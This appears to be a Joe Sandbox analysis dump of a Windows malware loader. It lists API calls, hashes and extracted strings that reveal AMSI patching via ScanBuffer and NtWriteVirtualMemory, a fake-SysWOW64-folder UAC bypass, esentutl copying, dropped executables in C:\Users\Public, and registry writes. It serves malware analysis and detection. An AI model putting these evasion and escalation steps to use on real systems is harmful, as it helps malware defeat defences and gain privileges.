Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                        • API String ID: 2961332323-3516509641
                                                                                                                        • Opcode ID: 8c28d36919ca504d3a6b6c894111d743852a20e899c10096123b428d2e7ccf47
                                                                                                                        • Instruction ID: a05515ad74fcf36431cd4a891c44a9810900f5de4d29d20fb838be5f7046d8b9
                                                                                                                        • Opcode Fuzzy Hash: 8c28d36919ca504d3a6b6c894111d743852a20e899c10096123b428d2e7ccf47
                                                                                                                        • Instruction Fuzzy Hash: C0430A35A0426CDBCB12EB64DC809DEB3FAFF95344F5040E6E409AB314DA74AE958F61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D4DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DD5E), ref: 02D4DCCB
                                                                                                                          • Part of subcall function 02D4DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D4DD05
                                                                                                                          • Part of subcall function 02D4DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D4DD32
                                                                                                                          • Part of subcall function 02D4DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D4DD3B
                                                                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,02D5BB30,00000000,00000000,02D5BB24,00000000,00000000), ref: 02D540CB
                                                                                                                          • Part of subcall function 02D488B8: LoadLibraryW.KERNEL32(amsi), ref: 02D488C1
                                                                                                                          • Part of subcall function 02D488B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D48920
                                                                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,000003E8,ScanBuffer,02DB7380,02D5B7B8,UacScan,02DB7380), ref: 02D54277
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        • Sleep.KERNEL32(00004E20,UacScan,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacInitialize,02DB7380,02D5B7B8), ref: 02D550EE
                                                                                                                          • Part of subcall function 02D4DC04: RtlI.N(?,?,00000000,02D4DC7E), ref: 02D4DC2C
                                                                                                                          • Part of subcall function 02D4DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC42
                                                                                                                          • Part of subcall function 02D4DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC61
                                                                                                                          • Part of subcall function 02D37E5C: GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                          • Part of subcall function 02D485BC: WinExec.KERNEL32(?,?), ref: 02D48624
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                        • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                        • API String ID: 2171786310-3926298568
                                                                                                                        • Opcode ID: a2477d2258ba79bbae112ca07f0f59678f3cc11b1de6acb6f5071494d9907241
                                                                                                                        • Instruction ID: 5d17fc8293c0e1639ec5b22a5b8f722d0079df229f2cb19de2a0e3deeb1c717b
                                                                                                                        • Opcode Fuzzy Hash: a2477d2258ba79bbae112ca07f0f59678f3cc11b1de6acb6f5071494d9907241
                                                                                                                        • Instruction Fuzzy Hash: A443FA34A0026DCBDB52EB64DC80ADEB3BAFF85304F5040E69409AB714DE74AE95DF61

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D48788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02DB7380,02D4EF4C,OpenSession,02DB7380,02D4EF4C,UacScan,02DB7380,02D4EF4C,ScanBuffer,02DB7380,02D4EF4C,OpenSession,02DB7380), ref: 02D4ED6E
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02DB7380,02D4EF4C,OpenSession,02DB7380,02D4EF4C,UacScan,02DB7380,02D4EF4C,ScanBuffer,02DB7380,02D4EF4C,OpenSession), ref: 02D4ED76
                                                                                                                        • CloseHandle.KERNEL32(000008C0,00000000,00000000,000000FF,ScanString,02DB7380,02D4EF4C,OpenSession,02DB7380,02D4EF4C,UacScan,02DB7380,02D4EF4C,ScanBuffer,02DB7380,02D4EF4C), ref: 02D4ED7F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                        • String ID: )"C:\Users\Public\Libraries\lxpbyalD.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                        • API String ID: 3475578485-3759695608
                                                                                                                        • Opcode ID: 100ed2d228e55004a3c03e74a1c72d45006d09ce716efd960cc7b0c6038e8153
                                                                                                                        • Instruction ID: 5e4aa6970c72dbb0d55e67bdeda94560efd26eec68fd264f9bcf27734ecb611a
                                                                                                                        • Opcode Fuzzy Hash: 100ed2d228e55004a3c03e74a1c72d45006d09ce716efd960cc7b0c6038e8153
                                                                                                                        • Instruction Fuzzy Hash: 0422EE74A00159ABEB52FB64D881BCEB3B6FF95300F5042A5A005EB354DF38AE458F76

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?,02D32000), ref: 02D317D0
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,02D32000), ref: 02D317E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 39e80eecf6e81f540e5b1d9e0a706842d1d0c150a02d391f31fde70a450d1acb
                                                                                                                        • Instruction ID: f0e677849dc0c0cde6ead42d42ff219a1aa07926d64c15698b8a6b8a3283ff88
                                                                                                                        • Opcode Fuzzy Hash: 39e80eecf6e81f540e5b1d9e0a706842d1d0c150a02d391f31fde70a450d1acb
                                                                                                                        • Instruction Fuzzy Hash: 23B11276A00252CBCB17CF68E8A4355BBE1FB86315F1986AED45D8B386C770DC51CBA0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 02D488C1
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                          • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D48920
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                                                        • API String ID: 941070894-2671292670
                                                                                                                        • Opcode ID: 33430faf3c9f475d162792b5d828f66a15da6b06b22e8af17551101993559341
                                                                                                                        • Instruction ID: adb670d7bbf0e6c128c50b1818cba5826152616e4f1cdf237623c117fbf34ded
                                                                                                                        • Opcode Fuzzy Hash: 33430faf3c9f475d162792b5d828f66a15da6b06b22e8af17551101993559341
                                                                                                                        • Instruction Fuzzy Hash: 5AF08C5044C781BAE201E2748C49F4BBACD8B622A4F008A58B1A89A3D2DA79D5059BB7

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?), ref: 02D31B17
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?), ref: 02D31B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 631dcbe4d0d497e3166ed2f11d303dfdeba3448a2ffcc6c4a348ade1bdd33514
                                                                                                                        • Instruction ID: 69553dd5e85564f938a7edf85014dc8f9aa4df3be20f772125dbf861e9738e70
                                                                                                                        • Opcode Fuzzy Hash: 631dcbe4d0d497e3166ed2f11d303dfdeba3448a2ffcc6c4a348ade1bdd33514
                                                                                                                        • Instruction Fuzzy Hash: 5A51BD716052428FDB17CF68C9947A6BBE0EF46324F1885AED448CB382E7B0CC45CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D4E5F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        • Opcode ID: b5c8e47f977d91f1a1919916ac9c091cd7356e7ba9c8ff699aa817a66a83cf52
                                                                                                                        • Instruction ID: f73884ba20e7926f5018a5cdb5eb09964e9fb603caa42bc5579f5de4544241a0
                                                                                                                        • Opcode Fuzzy Hash: b5c8e47f977d91f1a1919916ac9c091cd7356e7ba9c8ff699aa817a66a83cf52
                                                                                                                        • Instruction Fuzzy Hash: 0141FF35B11188ABEB02EBA4E841ADEB3FAFF88700F504825E045E7351DE78AD058F75
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02D48624
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        • Opcode ID: b653e59767e051fc11a57b8a96d1cb17d4ab7cf9687606437dea4c166c7cf033
                                                                                                                        • Instruction ID: 03d0404a92317dd7785ee39d110fafeb3b93a81275b33785681ca5e53cce7d88
                                                                                                                        • Instruction Fuzzy Hash: E3013172B84284FFFB42EFA4EC51F5A77EDEB49B40F514460B900D6740DA74AD109A35
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02D48624
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        • Opcode ID: 7b2a24769406966e9e3f494b9f8710d9480c0caf274cb9b8ca0eadc8c6293cca
                                                                                                                        • Instruction ID: ed804a8122d7167a86572864160e46d7ab64307f34c282d65f8b8a3ea0bccd3a
                                                                                                                        • Instruction Fuzzy Hash: A7F03172A84284EFEB42EFA4EC51F5A77ADEB49B40F514460B900D6740DA74AD109A35
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D45D74,?,?,02D43900,00000001), ref: 02D45C88
                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D45D74,?,?,02D43900,00000001), ref: 02D45CB6
                                                                                                                          • Part of subcall function 02D37D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D43900,02D45CF6,00000000,02D45D74,?,?,02D43900), ref: 02D37DAA
                                                                                                                          • Part of subcall function 02D37F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D43900,02D45D11,00000000,02D45D74,?,?,02D43900,00000001), ref: 02D37FB7
                                                                                                                        • GetLastError.KERNEL32(00000000,02D45D74,?,?,02D43900,00000001), ref: 02D45D1B
                                                                                                                          • Part of subcall function 02D3A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D3C3D9,00000000,02D3C433), ref: 02D3A797
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 503785936-0
                                                                                                                        • Opcode ID: d297b48548f5a849673246126baa6ec63bf6d880a20ed8aeb61043ba8dfcefcf
                                                                                                                        • Instruction ID: 641ac528a66a7c88a5adac827e7ca73990c68730e4f59b2e3b63bd6f6582bbef
                                                                                                                        • Instruction Fuzzy Hash: 56318F70E006099FDB01EFA8D981BAEB7F6EF49700F908465E504AB390DB756E048FB1
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02EABA58), ref: 02D4F258
                                                                                                                        • RegSetValueExA.ADVAPI32(000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F290
                                                                                                                        • RegCloseKey.ADVAPI32(000008D8,000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F29B
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: 8f452e3c8b13819f9d0326c65911cf9010e3344ffce29fef40330558b9e4a59d
                                                                                                                        • Instruction ID: dedcf9a3d81203fcd777eb2a187bddb9bb486b6ec958b1158d7828d0bfdb260d
                                                                                                                        • Instruction Fuzzy Hash: DC112B72A40244AFEB01EFA9D88199A7BEDEB08700F414569B505D7750DA34EE408F74
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02EABA58), ref: 02D4F258
                                                                                                                        • RegSetValueExA.ADVAPI32(000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F290
                                                                                                                        • RegCloseKey.ADVAPI32(000008D8,000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F29B
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: b3e1059b86609d89be4046b51e8f0f5ea04d3424fcbe69f7c0e48ad07c620dec
                                                                                                                        • Instruction ID: a22389e99f17b50998414b383a51f6f1b29004dcc61bc0bb304b437ff6d82cb6
                                                                                                                        • Instruction Fuzzy Hash: 43113A72A40244AFEB02EFA9E881E9E7BEDEB08700F414569B505D7750DB34EE408FB4
                                                                                                                        APIs
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: c4ea0658458a8013d24bea34a0eb0ac453f6a3f31b2075eacce33bf0dc010217
                                                                                                                        • Instruction ID: 7d58df561cffc866595b24b6bb189d28b28d93bcdc1c9a7cb06618ff9dc7f079
                                                                                                                        • Instruction Fuzzy Hash: ABF0CD2171A110C79B237B39DD846AA279A9F40342B145836B4C6AB3C6CBB9CC45CBB2
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02D34D5B
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D34D6D
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 986138563-0
                                                                                                                        • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                        • Instruction ID: 2c0cf7ec9dccd593fd2a05a80f90b38be7ef776467e1c4a500f485e8e95c5bee
                                                                                                                        • Instruction Fuzzy Hash: D4E0ECBC2052065EEA166F21DD41A36262AEFC1754F14C499A840CA354DB7CDC40AD38
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 02D473DA
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 3341692771-2852464175
                                                                                                                        • Opcode ID: fd49e1365938428de8197f8916c26a6a802590abb0963e6ac34e8cfe5ca0467c
